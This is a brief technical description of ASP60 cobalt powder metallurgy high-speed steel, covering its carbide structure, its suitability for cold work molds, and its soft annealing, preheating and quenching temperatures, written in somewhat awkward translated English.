 ASP60 is a high-performance powder metallurgy high-speed steel containing cobalt. The 10.5% cobalt content improves the material’s high-temperature performance (such as red hardness and tempering resistance), compressive strength and elastic modulus. ASP60 contains a large number of very small, very hard, uniformly distributed carbides, which are formed by combining high amounts of carbon with a large number of carbide-forming elements (such as chromium, molybdenum, tungsten, and vanadium). The small particles of carbides in ASP60 are not conducive to initiation of cracks, and improve the wear resistance of the material.

  ASP60 is particularly suitable for cold work molds that need to meet both extremely high wear resistance and compressive strength.

  ASP60 processing method:

  ASP-60 heat treatment:

  Soft annealing

  According to the introduction of PTJ SHOP engineers, soft annealing takes 3 hours at 850-900 ° C, then slowly cools to 700 ° C / h at 10 ° C / h, then air-cooled, the stress is relieved at 600-700 ° C for 2 hours, then slowly Slowly cool 500 ℃.

  ★ Hardening

  1. It needs to be pre-heated in 2 steps, 450-500 ℃ and 850-900 ℃

  2. The quenching temperature is then 1100-1190 ° C, followed by cooling to 40-50 ° C.
